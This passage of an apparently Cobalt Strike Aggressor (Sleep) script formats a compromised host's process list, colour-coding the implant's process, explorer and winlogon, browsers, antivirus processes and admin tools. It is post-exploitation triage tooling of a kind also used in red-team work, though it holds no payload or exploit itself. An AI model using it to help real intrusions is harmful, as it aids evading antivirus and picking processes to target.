28 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
29 | # highlight current process in YELLOW
30 | } else if ($pid eq $bd['pid']) {
31 | push(@ps, %(pid => $pid, entry => "\c8 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
32 | # highlight explorer , winlogon in BLUE
33 | } else if ($name eq "explorer.exe" || $name eq "winlogon.exe") {
34 | push(@ps, %(pid => $pid, entry => "\c2 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
35 | # highlight browsers processes in GREEN
36 | } else if ($name eq "chrome.exe" || $name eq "firefox.exe" || $name eq "iexplore.exe" || $name eq "MicrosoftEdgeCP.exe" || $name eq "MicrosoftEdge.exe") {
37 | push(@ps, %(pid => $pid, entry => "\c3 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
38 | # highlight av1 processes in RED.
39 | } else if(iff($name in @av1,true,false)) {
40 | push(@ps, %(pid => $pid, entry => "\c4 $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
41 | # highlight Admin Tools in Light Blue
42 | } else if(iff($name in @admin,true,false)) {
43 | push(@ps, %(pid => $pid, entry => "\cB $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user \o"));
44 | } else {
45 | push(@ps, %(pid => $pid, entry => " $[5]pid $[5]ppid $[28]name $[5]arch $[11]session $user"));
46 | }
47 | }
48 | # sort the processes please
49 | sort({ return $1['pid'] <=> $2['pid']; }, @ps);
50 | # append to our outstring
51 | foreach $temp (@ps) {
52 | $outps .= "$temp['entry'] \n";
53 | }
54 | return $outps;
55 | }
56 |
--------------------------------------------------------------------------------